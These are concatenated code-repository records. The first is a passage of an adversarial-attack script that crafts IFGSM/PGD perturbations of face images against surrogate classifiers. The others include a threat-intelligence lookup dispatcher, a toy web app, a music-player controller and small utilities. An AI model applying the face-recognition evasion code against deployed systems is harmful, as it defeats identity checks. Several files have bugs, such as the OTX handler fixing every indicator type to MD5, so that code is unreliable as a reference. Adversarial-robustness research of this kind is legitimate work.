alpha, n_decoders, \n ce_method, \n batch_size, n_imgs_per_person,\n):\n model.eval()\n ori_img = ori_img.to(device)\n\n target = [0]*n_imgs_per_person + [1]*n_imgs_per_person\n # print(prototype_inds)\n # tar_img = []\n # for i in range(n_decoders):\n # tar_img.append(ori_img[prototype_inds[0], prototype_inds[1]])\n # # tar_img.append(ori_img[[prototype_inds[2*i],prototype_inds[2*i+1]]])\n # tar_img = torch.cat(tar_img, dim = 0)\n\n nChannels = 3\n if n_decoders == 1:\n decoder_size = 224\n else:\n decoder_size = 56\n # tar_img = F.interpolate(tar_img, size=(56,56))\n\n # tar_img = tar_img.reshape(n_decoders,2,nChannels,decoder_size,decoder_size).unsqueeze(1)\n # tar_img = tar_img.repeat(1,batch_size,1,1,1,1).reshape(batch_size*n_decoders,2,nChannels,decoder_size,decoder_size)\n img = ori_img.clone()\n\n for i in range(attack_niters):\n if ce_method == 'ifgsm':\n img_x = img\n elif ce_method == 'pgd':\n img_x = img + img.new(img.size()).uniform_(-eps, eps)\n\n img_x.requires_grad_(True)\n \n outs, _ = model(img_x)\n # outs = torch.cat(outs, dim = 0).unsqueeze(1).repeat(1,2,1,1,1)\n # loss_mse_ = nn.MSELoss(reduction='none')(\n # outs, target\n # ).sum(dim = (2,3,4)) / (nChannels*decoder_size*decoder_size)\n\n # loss_mse = - alpha * loss_mse_\n label = torch.tensor(([0]*n_imgs_per_person+[1]*n_imgs_per_person)*n_decoders).long().to(device)\n loss = nn.CrossEntropyLoss()(outs,label)\n \n if (i+1) % 50 == 0 or i == 0:\n print('attacking {}, {:0.4f}'.format(i, loss.item()))\n\n loss.backward()\n\n input_grad = img_x.grad.data.sign()\n img = img.data + 1. / 255 * input_grad\n img = torch.where(img > ori_img + eps, ori_img + eps, img)\n img = torch.where(img < ori_img - eps, ori_img - eps, img)\n img = torch.clamp(img, min=0, max=1)\n print('')\n return img.data\n\n# TODO: fix. Need to get the prototype_inds working\ndef attack_ce_prototypical(\n model, device, \n ori_img, \n attack_niters, eps, alpha, n_decoders, \n ce_method, \n batch_size, n_imgs_per_person, \n):\n model.eval()\n ori_img = ori_img.to(device)\n\n prototype_inds = [0, n_imgs_per_person]# + [1]*n_imgs_per_person\n # print(prototype_inds)\n tar_img = []\n for i in range(n_decoders):\n tar_img.append(ori_img[[prototype_inds[0], prototype_inds[1]]])\n # tar_img.append(ori_img[[prototype_inds[2*i],prototype_inds[2*i+1]]])\n tar_img = torch.cat(tar_img, dim = 0)\n\n nChannels = 3\n if n_decoders == 1:\n decoder_size = 224\n else:\n decoder_size = 56\n tar_img = F.interpolate(tar_img, size=(56,56))\n\n tar_img = tar_img.reshape(n_decoders,2,nChannels,decoder_size,decoder_size).unsqueeze(1)\n tar_img = tar_img.repeat(1,batch_size,1,1,1,1).reshape(batch_size*n_decoders,2,nChannels,decoder_size,decoder_size)\n img = ori_img.clone()\n\n for i in range(attack_niters):\n if ce_method == 'ifgsm':\n img_x = img\n elif ce_method == 'pgd':\n img_x = img + img.new(img.size()).uniform_(-eps, eps)\n img_x.requires_grad_(True)\n outs, _ = model(img_x)\n outs = torch.cat(outs, dim = 0).unsqueeze(1).repeat(1,2,1,1,1)\n loss_mse_ = nn.MSELoss(reduction='none')(outs,tar_img).sum(dim = (2,3,4))/(nChannels*decoder_size*decoder_size)\n loss_mse = - alpha * loss_mse_\n label = torch.tensor(([0]*n_imgs_per_person+[1]*n_imgs_per_person)*n_decoders).long().to(device)\n loss = nn.CrossEntropyLoss()(loss_mse,label)\n if (i+1) % 50 == 0 or i == 0:\n print('attacking {}, {:0.4f}'.format(i, loss.item()))\n\n loss.backward()\n\n input_grad = img_x.grad.data.sign()\n img = img.data + 1. / 255 * input_grad\n img = torch.where(img > ori_img + eps, ori_img + eps, img)\n img = torch.where(img < ori_img - eps, ori_img - eps, img)\n img = torch.clamp(img, min=0, max=1)\n print('')\n return img.data\n\ndef attack_loop(\n device, \n n_decoders, surrogate, mode,\n ce_niters, ce_epsilon, ce_alpha, ce_method,\n ila_niters, ila_epsilon,\n data_loader, batch_size, n_imgs_per_person,\n save_dir,\n start_idx, end_idx\n):\n for data_ind, (original_img, _) in enumerate(data_loader):\n if not start_idx <= data_ind < end_idx:\n continue\n print('loading model', save_dir.split('/')[-2], data_ind)\n model = initialize_model(surrogate, n_decoders, device)\n model.load_state_dict(torch.load(os.path.join(save_dir, 'models', '{}.pth'.format(data_ind))))\n \n model.eval()\n original_img = original_img.to(device)\n\n if mode == 'supervised':\n old_att_img = attack_ce_supervised(\n model, device, \n original_img, \n ce_niters, ce_epsilon, ce_alpha, n_decoders, \n ce_method, \n batch_size, n_imgs_per_person,\n )\n elif mode == 'prototypical':\n # prototype_ind_csv = open(ae_dir+'/prototype_ind.csv', 'r')\n # prototype_ind_ls = list(csv.reader(prototype_ind_csv))\n old_att_img = attack_ce_prototypical(\n model, device, n_decoders=n_decoders, \n ori_img=original_img, \n attack_niters=ce_niters, eps=ce_epsilon, alpha=ce_alpha, \n ce_method=ce_method, \n batch_size=batch_size, n_imgs_per_person=n_imgs_per_person\n )\n else:\n old_att_img = attack_ce_unsupervised(\n model, device, original_img, \n attack_niters = ce_niters, eps = ce_epsilon, alpha=ce_alpha, \n batch_size=batch_size, n_imgs_per_person = n_imgs_per_person,\n ce_method=ce_method\n )\n\n att_img = attack_ila(\n model, device, original_img, old_att_img, \n ila_niters, eps=ila_epsilon\n )\n # TODO: save the image\n for save_ind in range(batch_size):\n # file_path, file_name = dataset.imgs[data_ind * 2*n_imgs + save_ind][0].split('/')[-2:]\n fname = os.path.basename(data_loader.dataset.data[data_ind * batch_size + save_ind])\n # fname = data_loader.dataset.data[data_ind * batch_size + save_ind].split('/')[-1]\n\n # file_dir = fpath[-3] + '/' + fpath[-2]\n # file_name = fpath[-1]\n img_save_dir = os.path.join(save_dir, 'images', str(data_ind))\n os.makedirs(img_save_dir, exist_ok=True)\n img_save_path = os.path.join(img_save_dir, fname.split('.')[0] + '.png')\n # print('saving image at:', img_save_path)\n save_attack_img(\n att_img[save_ind],\n img_save_path\n # os.path.join()\n # img_save_dir + fname.split('.')[0] + '.png'\n )\n print('\\r', data_ind * batch_size + save_ind, 'images saved.', end=' ')\n\ndef main(\n data_loader,\n batch_size=20,\n train=True,\n force_retrain=False,\n n_iters=15000, \n n_decoders=1,\n lr=0.001, \n surrogate='resnet',\n mode='jigsaw', \n ce_epsilon=0.3,\n ce_niters=200,\n ce_alpha=1.0,\n ce_method='ifgsm',\n ila_epsilon=0.1,\n ila_niters=100,\n start_idx = 0,\n end_idx=2500,\n save_dir='./attacks/no_box', \n seed=0\n):\n surrogate = surrogate.lower()\n assert surrogate in ['resnet', 'vgg', 'resnet_pretrained', 'vgg_pretrained'], 'unrecognized surrogate model!'\n\n assert batch_size % 2 == 0, 'Batch size must be even'\n n_imgs_per_person = batch_size // 2\n\n assert n_decoders <= n_imgs_per_person**2, 'Too many decoders'\n # probably should only have one decoder..\n\n assert mode in ['naive', 'jigsaw', 'rotate', 'prototypical']\n \n if mode == 'jigsaw':\n print('Warning: jigsaw models likely will not learn well')\n\n cudnn.benchmark = False\n cudnn.deterministic = True\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n np.random.seed(seed)\n\n if torch.cuda.is_available():\n print('running on cuda device')\n device = torch.device('cuda')\n else:\n print('running on cpu')\n device = torch.device('cpu')\n\n save_dir = '%s/%s_batch_%d_decoders_%d_mode_%s_iters_%d_lr_%s/'%(\n save_dir,\n surrogate, batch_size, n_decoders,\n mode, n_iters, \n ('%s'%lr).replace('0.','')\n )\n\n if train:\n os.makedirs(os.path.join(save_dir, 'models'), exist_ok=True)\n\n train_loop(\n device=device, \n n_decoders=n_decoders, surrogate=surrogate, lr=lr, n_iters=n_iters, mode=mode, \n data_loader=data_loader, batch_size=batch_size, n_imgs_per_person=n_imgs_per_person, \n save_dir=save_dir, \n start_idx=start_idx, end_idx=end_idx,\n force_retrain=force_retrain\n )\n else: # attack\n attack_loop(\n device,\n n_decoders=n_decoders, surrogate=surrogate, mode=mode,\n ce_niters=ce_niters, ce_epsilon=ce_epsilon, ce_alpha=ce_alpha, ce_method=ce_method,\n ila_niters=ila_niters, ila_epsilon=ila_epsilon,\n data_loader=data_loader, batch_size=batch_size, n_imgs_per_person=n_imgs_per_person,\n save_dir=save_dir,\n start_idx=start_idx, end_idx=end_idx\n )\n","repo_name":"will-jac/adverse-face","sub_path":"attacks/no_box/no_box.py","file_name":"no_box.py","file_ext":"py","file_size_in_byte":18036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34653686324","text":"import json\nimport os\n\n\nclass ConfigManager:\n ''' Manages the configuration file for the application. The configuration file can be found in the location defined in install_variables.\n\n If no configuration file exists, one will be created\n\n '''\n\n def __init__(self):\n install_variables = json.loads(open('config/install_variables.json').read())\n self.config_path = install_variables['config_location']\n self.config_files = {\n 'providers':'providers.json'\n }\n\n\n if not os.path.isfile(os.path.join(self.config_path, self.config_files['providers'])):\n self.write_providers([])\n\n def get_providers(self):\n ''' gets the api providers from the config files\n\n Returns:\n (list(dict)): A list of dictionaries, in the form \"name\":NAME, \"service\":SERVICE, \"token\":TOKEN\n ''' \n with open(os.path.join(self.config_path, self.config_files['providers']), 'r') as f:\n return json.loads(f.read())\n\n def write_providers(self, providers_list):\n ''' Writes a list of providers to file\n\n Args:\n providers_list (list(dict)): A list of provider definitions\n '''\n with open(os.path.join(self.config_path, self.config_files['providers']), 'w') as f:\n write_string = json.dumps({'api_providers':providers_list})\n f.write(write_string)","repo_name":"willstrach/Tongues-Translator","sub_path":"config/config_manager.py","file_name":"config_manager.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30890949204","text":"#!/usr/bin/env python3\r\n#\r\n# Copyright (c) 2020, 2021 Oracle and/or its affiliates. All rights reserved.\r\n#\r\nimport os\r\nimport json\r\nfrom OTXv2 import OTXv2\r\nimport IndicatorTypes\r\nimport requests\r\nimport copy\r\nimport vt\r\n\r\nclass OtxHandler:\r\n \"\"\"\r\n Handler class for connecting to and using the OTX API for threat intelligence.\r\n \"\"\"\r\n def __init__(self, api_key):\r\n self.limit_per_min = -1 # no limit\r\n self.otx = OTXv2(api_key)\r\n self.output = {\r\n \"ipv4s\": {},\r\n \"ipv6s\": {},\r\n \"domains\": {},\r\n \"md5s\": {},\r\n \"sha1s\": {},\r\n \"sha256s\": {},\r\n \"urls\": {},\r\n \"cves\": {},\r\n }\r\n # maps an indicator type to the reference required by OTXv2\r\n self.supported_indicators = {\r\n \"ipv4s\": IndicatorTypes.IPv4,\r\n \"ipv6s\": IndicatorTypes.IPv6,\r\n \"domains\": IndicatorTypes.DOMAIN,\r\n \"md5s\": IndicatorTypes.FILE_HASH_MD5,\r\n \"sha1s\": IndicatorTypes.FILE_HASH_SHA1,\r\n \"sha256s\": IndicatorTypes.FILE_HASH_SHA256,\r\n \"urls\": IndicatorTypes.URL,\r\n \"cves\": IndicatorTypes.CVE,\r\n }\r\n\r\n def run(self, indicators, indicator_type, maximum):\r\n \"\"\"\r\n Utilises the OTXv2 library to query and store results\r\n relating to threat intelligence observables from the OTX API.\r\n \"\"\"\r\n if indicator_type not in self.supported_indicators:\r\n print(f'[OTX] does not support {indicator_type}')\r\n exit()\r\n\r\n if indicator_type not in indicators:\r\n print(f'[OTX] {indicator_type} not found in provided observables')\r\n exit()\r\n\r\n print(f'[OTX] Querying a maximum of {maximum} out of {len(indicators[indicator_type])} {indicator_type}')\r\n count = 0\r\n for i in indicators[indicator_type]:\r\n if count == maximum:\r\n break\r\n\r\n # used to get an indicator when in format {value, source}\r\n if isinstance(i, dict):\r\n i = i['value']\r\n\r\n details = self.otx.get_indicator_details_full(\r\n IndicatorTypes.FILE_HASH_MD5, i)\r\n self.output[indicator_type][i] = details\r\n\r\n count += 1\r\n print(\"[OTX] complete\")\r\n\r\nclass ThreatMinerHandler:\r\n \"\"\"\r\n Handler class for connecting to and using the ThreatMiner API for threat intelligence.\r\n \"\"\"\r\n def __init__(self):\r\n self.limit_per_min = 10\r\n self.output = {\r\n \"ipv4s\": {},\r\n \"md5s\": {},\r\n \"sha1s\": {},\r\n \"sha256s\": {},\r\n \"imphashes\": {},\r\n \"ssdeeps\": {},\r\n \"email_addresses\": {},\r\n \"domains\": {},\r\n }\r\n # maps indicator type names to indicator_ids used in API call\r\n self.supported_indicators = {\r\n \"ipv4s\": \"host\",\r\n \"md5s\": \"sample\",\r\n \"sha1s\": \"sample\",\r\n \"sha256s\": \"sample\",\r\n \"imphashes\": \"imphash\",\r\n \"ssdeeps\": \"ssdeep\",\r\n \"email_addresses\": \"emails\",\r\n \"domains\": \"domain\",\r\n }\r\n # maps indicator_ids to rt flags\r\n self.indicator_rts = {\r\n \"domain\": {\r\n 1: 'whois',\r\n 2: 'passive dns',\r\n 3: 'example query uri',\r\n 4: 'related samples',\r\n 5: 'subdomains',\r\n 6: 'report tagging',\r\n },\r\n \"host\": {\r\n 1: 'whois',\r\n 2: 'passive dns',\r\n 3: 'URIs',\r\n 4: 'related samples',\r\n 5: 'SSL certificates',\r\n 6: 'report tagging',\r\n },\r\n \"sample\": {\r\n 1: 'metadata',\r\n 2: 'http traffic',\r\n 3: 'hosts',\r\n 4: 'mutants',\r\n 5: 'registry keys',\r\n 6: 'av detections',\r\n 7: 'report tagging',\r\n },\r\n \"imphash\": {\r\n 1: 'samples',\r\n 2: 'report tagging',\r\n },\r\n \"ssl\": {\r\n 1: 'hosts',\r\n 2: 'report tagging',\r\n },\r\n \"emails\": {\r\n 1: 'domains',\r\n },\r\n }\r\n self.request_headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.130 Safari/537.36'\r\n }\r\n\r\n def run(self, indicators, indicator_type, maximum):\r\n '''\r\n ThreatMiner query format:\r\n https://api.threatminer.org/v2/{indicator_id}.php?q={observable}&rt={rt}\r\n\r\n indicator_type indicator_id\r\n domains domain\r\n ipv4s host\r\n hashes sample (sha1, sha256, sha512, ssdeep, imphash)\r\n imphashes imphash\r\n ssdeeps ssdeep\r\n email_addresses email\r\n\r\n rt flag numbers and their descriptions for each indicator_id is represented in the indicators_rts dictionary\r\n '''\r\n\r\n if indicator_type not in self.supported_indicators:\r\n print(f'[ThreatMiner] does not support {indicator_type}')\r\n exit()\r\n\r\n if indicator_type not in indicators:\r\n print(f'[ThreatMiner] {indicator_type} not found in provided observables')\r\n exit()\r\n\r\n print(f'[ThreatMiner] Querying a maximum of {maximum} out of {len(indicators[indicator_type])} {indicator_type}')\r\n count = 0\r\n for i in indicators[indicator_type]:\r\n if count == maximum:\r\n break\r\n\r\n # used to get an indicator when in format {value, source}\r\n if isinstance(i, dict):\r\n i = i['value']\r\n\r\n indicator_id = self.supported_indicators[indicator_type]\r\n\r\n for flag in self.indicator_rts[indicator_id]:\r\n url = f\"https://api.threatminer.org/v2/{indicator_id}.php?q={i}&rt={flag}\"\r\n r = requests.get(url, headers=self.request_headers)\r\n j = json.loads(r.text)\r\n \r\n flag_desc = self.indicator_rts[indicator_id][flag]\r\n if j.get('status_code') == '200': # response found\r\n print(f'[ThreatMiner] Success! (Observable: {i} | Flag: {flag})')\r\n if flag_desc not in self.output[indicator_type]:\r\n self.output[indicator_type][flag_desc] = {}\r\n self.output[indicator_type][flag_desc][i] = j.get('results')\r\n else:\r\n status_code = j.get('status_code')\r\n print(f'[ThreatMiner] Failure! (Observable: {i} | ID: {indicator_id} | Flag: {flag} | Status Code: {status_code})')\r\n\r\n count += 1\r\n print(\"[ThreatMiner] complete\")\r\n\r\nclass VirusTotalHandler:\r\n \"\"\"\r\n Handler class for connecting to and using the VirusTotal API for threat intelligence.\r\n Docs: https://developers.virustotal.com/v3.0/\r\n API Request Limitations:\r\n Rate = 4 requests / minute\r\n Maximum = 500 requests / day\r\n \"\"\"\r\n def __init__(self, api_key):\r\n self.limit_per_min = 4 #doesn't seem accurate?\r\n self.vt_client = vt.Client(api_key)\r\n self.output = {\r\n \"ipv4s\": {},\r\n \"md5s\": {},\r\n \"sha1s\": {},\r\n \"sha256s\": {},\r\n \"urls\": {},\r\n \"domains\": {},\r\n }\r\n # maps supported indicators to their API object reference id\r\n self.supported_indicators = {\r\n \"ipv4s\": \"ip_addresses\",\r\n \"md5s\": \"files\",\r\n \"sha1s\": \"files\",\r\n \"sha256s\": \"files\",\r\n \"urls\": \"urls\",\r\n \"domains\": \"domains\",\r\n }\r\n\r\n def run(self, indicators, indicator_type, maximum):\r\n \"\"\"\r\n Utilises the vt-py library to query and store results\r\n relating to threat intelligence observables from the VirusTotal v3 API.\r\n \"\"\"\r\n if maximum > 500:\r\n print(f'[VirusTotal] {maximum} > 500 | maximum of 500 API calls a day for free accounts')\r\n maximum = 500\r\n\r\n if indicator_type not in self.supported_indicators:\r\n print(f'[VirusTotal] does not support {indicator_type}')\r\n exit()\r\n\r\n if indicator_type not in indicators:\r\n print(f'[VirusTotal] {indicator_type} not found in provided observables')\r\n exit()\r\n\r\n print(f'[VirusTotal] Querying a maximum of {maximum} out of {len(indicators[indicator_type])} {indicator_type}')\r\n count = 0\r\n for i in indicators[indicator_type]:\r\n if count == maximum:\r\n break\r\n # used to get an indicator when in format {value, source}\r\n if isinstance(i, dict):\r\n i = i['value']\r\n\r\n # required from vt-py\r\n if indicator_type == \"urls\":\r\n i = vt.url_id(i)\r\n\r\n try:\r\n req = f'/{self.supported_indicators[indicator_type]}/{i}'\r\n res = self.vt_client.get_object(req)\r\n print(f\"[VirusTotal] Success! {i}\")\r\n self.output[indicator_type][i] = {}\r\n self.output[indicator_type][i]['last_analysis_stats'] = res.last_analysis_stats\r\n self.output[indicator_type][i]['last_analysis_results'] = res.last_analysis_results\r\n # note: according to the docs, virustotal has a 4req/min limit, but I have not encountered any rate limit\r\n # if this becomes an issue in the future, put a sleep() here\r\n except vt.error.APIError as e:\r\n if e.code == 'NotFoundError':\r\n print(f\"[VirsTotal] Failure! {i}\")\r\n pass\r\n else:\r\n print(\"[VirusTotal] API Error:\", e)\r\n continue\r\n except Exception as e:\r\n print(\"[VirusTotal] Something unexpected went wrong: \", e)\r\n count += 1\r\n\r\n self.vt_client.close()\r\n print(\"[VirusTotal] complete\")\r\n\r\ndef loadObservables():\r\n '''\r\n Open the global_collation JSON outputted by the Protean pipeline.\r\n Returns only the extracted_iocs portion of the JSON\r\n '''\r\n with open(os.path.join(results_path, 'global_collation.json'), 'r') as fp:\r\n protean_json = json.load(fp)\r\n\r\n if 'extracted_iocs' in protean_json:\r\n return protean_json['extracted_iocs']\r\n elif 'iocextract' in protean_json:\r\n return protean_json['iocextract']\r\n else:\r\n return protean_json['ioc-finder']\r\n\r\nif __name__ == '__main__':\r\n \"\"\"\r\n The dispatcher provides methods to use the Protean's results (specifically observables extracted\r\n by iocextract or ioc-finder)\r\n \"\"\"\r\n results_path = os.path.dirname(__file__) + \"/results/\"\r\n observables = loadObservables()\r\n\r\n # API Keys\r\n otx_key = None\r\n vt_key = None\r\n config_path = os.path.dirname(os.path.dirname(__file__)) + \"/config/\"\r\n print(config_path)\r\n with open(config_path + \"api_keys.json\", 'r') as fp:\r\n api_keys = json.load(fp)\r\n\r\n otx_key = api_keys.get('otx_api', None)\r\n vt_key = api_keys.get('vt_api', None)\r\n\r\n if otx_key == None:\r\n print(\"OTX API Key not found\")\r\n\r\n if vt_key == None:\r\n print(\"VT API Key not found\")\r\n\r\n # Instantiate Classes\r\n otx_handler = OtxHandler(otx_key)\r\n tm_handler = ThreatMinerHandler()\r\n vt_handler = VirusTotalHandler(vt_key)\r\n\r\n # Run API for observables types in their respective filter\r\n with open(config_path + \"api_filters.json\", 'r') as fp:\r\n api_filters = json.load(fp)\r\n\r\n supported_apis = {\r\n 'otx': otx_handler.run,\r\n 'threatminer': tm_handler.run,\r\n 'virustotal': vt_handler.run\r\n }\r\n\r\n for api in supported_apis:\r\n for ioc_type in api_filters[api]:\r\n if ioc_type == \"max_requests_per_type\":\r\n continue\r\n if api_filters[api][ioc_type] == True:\r\n supported_apis[api](observables, ioc_type, api_filters[api][\"max_requests_per_type\"])\r\n\r\n # JSON export\r\n results = {\r\n \"otx_api_results\": otx_handler.output,\r\n \"threatminer_api_results\": tm_handler.output,\r\n \"virustotal_api_results\": vt_handler.output,\r\n }\r\n\r\n print(\"[APIDispatcher] Complete\")\r\n with open(results_path + \"api_outputs/api_results.json\", 'w') as fp:\r\n json.dump(results, fp)\r\n","repo_name":"uqcyber/Protean","sub_path":"tools/protean/src/api_dispatcher.py","file_name":"api_dispatcher.py","file_ext":"py","file_size_in_byte":12558,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"19396697492","text":"\nimport json\nimport os\n\ndef default_conf_file(conf_path):\n new_string = \"\"\" \n{\n \"commands\": \n [\n {\n \"name\": \"rewrite_text\",\n \"summary\": \"Rescrever o texto ...\",\n \"query\": \"Reescrever o texto corrigindo os problemas de escrita\\\\n\\\\n\",\n \"accelerator\":\"
北京欢迎你{}. beijing
'.format(id)\r\n\r\n\r\n@second_router.get('^/about$')\r\ndef about_handler(request):\r\n if request.vars:\r\n print(type(request.vars.id))\r\n res = Response()\r\n res.charset = 'utf-8'\r\n res.body = 'About me
'.encode()\r\n return res\r\n\r\n\r\nif __name__ == '__main__':\r\n SERVER_ADDRESS = (HOST, PORT) = '', 9999\r\n ip = '127.0.0.1'\r\n port = 9999\r\n httpd = make_server(SERVER_ADDRESS, CommonApp())\r\n print('WSGIServer: Serving HTTP on port {port} ...\\n'.format(port=PORT))\r\n httpd.serve_forever()\r\n\r\n","repo_name":"Zhang-Jane/simple_web_server","sub_path":"common_run.py","file_name":"common_run.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12817188827","text":"import signal\nimport random\nimport os\nimport psutil\nfrom subprocess import Popen\nfrom multiprocessing import Process, Manager\nfrom gmusicapi import Mobileclient\n\n\n'''\nReference:\nhttps://unofficial-google-music-api.readthedocs.io/en/latest/reference/mobileclient.html\n'''\n\n\nclass Song(object):\n def __init__(self, song_data: dict):\n self.id = song_data['storeId']\n self.name = song_data['title']\n self.artist = song_data['artist']\n if song_data['album'] == '<|\\u00ba_\\u00ba|>':\n song_data['album'] = 'Robot Face'\n self.album = song_data['album']\n\n\nclass Artist(object):\n def __init__(self, artist_data: dict):\n self.id = artist_data['artistId']\n self.name = artist_data['name']\n\n\nclass Album(object):\n def __init__(self, album_data: dict):\n self.id = album_data['albumId']\n self.name = album_data['name']\n self.artist = album_data['artist']\n\n\nclass Playlist(object):\n def __init__(self, name):\n self.name = name\n self.songs = []\n\n def add_song(self, song_data):\n self.songs.append(Song(song_data))\n\n def set_list(self, song_list: list):\n self.songs = song_list\n\n def shuffle(self):\n random.shuffle(self.songs)\n\n def __len__(self):\n return len(self.songs)\n\n\nclass SearchResults(object):\n def __init__(self, raw_data: dict):\n self.songs = []\n for s in raw_data['song_hits']:\n self.songs.append(Song(s['track']))\n self.artists = []\n for a in raw_data['artist_hits']:\n self.artists.append(Artist(a['artist']))\n self.albums = []\n for a in raw_data['album_hits']:\n self.albums.append(Album(a['album']))\n\n\nclass GoogleMusicController(object):\n def __init__(self):\n self.device_id = os.environ['GOOGLE_MUSIC_DEVICE_ID']\n self.client = Mobileclient(debug_logging=False)\n # TODO: change this to relative path from run location\n self.client.oauth_login(Mobileclient.FROM_MAC_ADDRESS, 'iota/auth.json')\n self.player_data = Manager().dict()\n self.player = None\n self.player_pid = None\n self.playlist = Playlist('Now Playing')\n\n def _get_entity(self, name: str, type: str, extra_filter=lambda _: True):\n results = self.search(name).__dict__[type]\n if len(results) == 0:\n return None\n results = list(filter(extra_filter, results))\n if len(results) == 0:\n return None\n # We will trust Google's ability to filter search results... :P\n return results[0]\n\n def _get_song(self, name: str, artist: str = '', album: str = '') -> Song:\n if artist != '' and album != '':\n return self._get_entity(\n name,\n 'songs',\n lambda x:\n x.artist.lower() == artist and x.album.lower() == album\n )\n if artist != '':\n return self._get_entity(\n name, 'songs', lambda x: x.artist.lower() == artist\n )\n if album != '':\n return self._get_entity(\n name, 'songs', lambda x: x.album.lower() == album\n )\n return self._get_entity(name, 'songs')\n\n def _get_album(self, name: str, artist: str = '') -> Album:\n if artist != '':\n return self._get_entity(\n name, 'albums', lambda x: x.artist == artist\n )\n return self._get_entity(name, 'albums')\n\n def _get_artist(self, name: str) -> Artist:\n return self._get_entity(name, 'artists')\n\n def _get_playlist(self, name: str) -> Playlist:\n playlists = self.client.get_all_user_playlist_contents()\n matched_playlists = []\n for p in playlists:\n p_name = p['name'].lower()\n if p_name == name or p_name == name.replace(' ', ''):\n matched_playlists.append(p)\n if len(matched_playlists) > 0:\n found = matched_playlists[0]\n self.playlist = Playlist(found['name'])\n [self.playlist.add_song(track['track'])\n for track in found['tracks']]\n return self.playlist\n return None\n\n def play_song(\n self, name: str, callback_at_end, artist: str = '', album: str = ''\n ):\n song = self._get_song(name, artist, album)\n if song is None:\n return f'I couldn\\'t find a song called {name} by {artist}'\n return self.play_playlist(\n 'Now Playing', callback_at_end, song_list=[song]\n )\n\n def play_playlist(\n self,\n name: str,\n callback_at_end,\n song_list=[],\n start=0,\n shuffle=False,\n ) -> str:\n if song_list == []:\n self.playlist = self._get_playlist(name)\n if self.playlist is None:\n return f'I couldn\\'t find a playlist called {name}'\n else:\n self.playlist = Playlist(name)\n self.playlist.set_list(song_list)\n if shuffle:\n self.playlist.shuffle()\n\n # Embed this so we don't have to pass a bunch of context out\n def get_url(id):\n # we need to logout and log back in to allow rapid requesting\n # of stream_urls -- they expire after a minute, and can't be\n # re-requested before then without an SSLError...thanks Google.\n self.client.logout()\n self.client.oauth_login(Mobileclient.FROM_MAC_ADDRESS, 'auth.json')\n return self.client.get_stream_url(id, device_id=self.device_id)\n # Spawn a subprocess for the player\n self.player = Process(\n target=spawn_player,\n args=(\n get_url,\n self.playlist,\n self.player_data,\n callback_at_end,\n start\n )\n )\n self.player.start()\n self.player_pid = self.player.pid\n return None\n\n def pause_song(self):\n if 'pid' in self.player_data.keys():\n psutil.Process(self.player_data['pid']).send_signal(signal.SIGSTOP)\n\n def resume_song(self):\n if 'pid' in self.player_data.keys():\n psutil.Process(self.player_data['pid']).send_signal(signal.SIGCONT)\n\n def stop_player(self):\n if 'pid' in self.player_data.keys():\n psutil.Process(self.player_data['pid']).send_signal(signal.SIGSTOP)\n # self.player.terminate()\n\n def next_song(self) -> str:\n if 'pid' in self.player_data.keys():\n psutil.Process(self.player_data['pid']).send_signal(signal.SIGTERM)\n\n def previous_song(self) -> str:\n if 'index' not in self.player_data.keys():\n return 'Could not start the playlist, missing index'\n idx = self.player_data['index']\n idx = idx - 1 if idx > 0 else 0\n if not self.player_data['done']:\n self.stop_player()\n self.play_playlist(\n self.playlist.name.lower(), self.playlist.songs, start=idx\n )\n return ''\n\n def start_over(self):\n return ''\n\n def search(self, query: str, max_results: int = 100) -> SearchResults:\n results = self.client.search(query, max_results)\n return SearchResults(results)\n\n\ndef spawn_player(get_url, playlist, shared, callback_at_end, start=0):\n for index in range(start, len(playlist.songs)):\n song = playlist.songs[index]\n stream_url = get_url(song.id).replace('https', 'http')\n process = Popen(['mpg123', '--quiet', stream_url])\n shared['pid'] = process.pid\n shared['index'] = index\n shared['done'] = False\n process.wait()\n shared['done'] = True\n callback_at_end()\n","repo_name":"3digitdev/iota","sub_path":"iota/modules/GoogleMusic/GoogleMusicController.py","file_name":"GoogleMusicController.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39920372760","text":"from editdist import edit_dist\nfrom tree import dictionary\n\n\ndef searchTree(tree, parent, query, similarWords):\n parentList = tree.get(parent)\n d = edit_dist(parent, query)\n tolerence = 2\n\n # if the parent word is in acceptable tolerance t\n if d <= tolerence:\n similarWords.append(parent)\n\n # Do not have the first index become a negative number\n if d - tolerence <= 0:\n low = 0\n else:\n low = d - tolerence\n\n # only look at children in acceptable range\n # [edit-dist(parent, query) + t, edit-distance(parent, query) - t]\n for i in range(low, d + tolerence + 1):\n try:\n child = parentList[i + 2][1]\n searchTree(tree, child, query, similarWords)\n except:\n break \n \n\ndef returnSimilars(tree, parent, query, similarWords):\n searchTree(tree, parent, query, similarWords)\n finalSuggestions = []\n finalTol = 1\n\n # make sure that the final words that are presented are within the\n # tolerence limit in order to make suggestions more accurate \n for i in range(len(similarWords)):\n if edit_dist(similarWords[i], query) <= finalTol:\n finalSuggestions.append(similarWords[i])\n\n return finalSuggestions\n\nqueryWord = input(\"What word do you want to check? \").lower().strip()\nprint(returnSimilars(dictionary, \"stick\", queryWord, []))","repo_name":"CodingKraken/spellcheck","sub_path":"BK_tree_search.py","file_name":"BK_tree_search.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"10975302956","text":"import random\n\n\nclass Triangle:\n def __init__(self, first_side, second_side, third_side):\n self.a = first_side\n self.b = second_side\n self.c = third_side\n\n def check_is_triangle(self):\n if self.a < self.b + self.c and self.b < self.c + self.a and self.c < self.a + self.b:\n length_type = 'Треугольник разносторонний'\n if self.a == self.b == self.c:\n length_type = 'Треугольник равносторонний'\n elif self.a == self.b or self.b == self.c or self.c == self.a:\n length_type = 'Треугольник равнобедренный'\n return f'Треугольник с такими 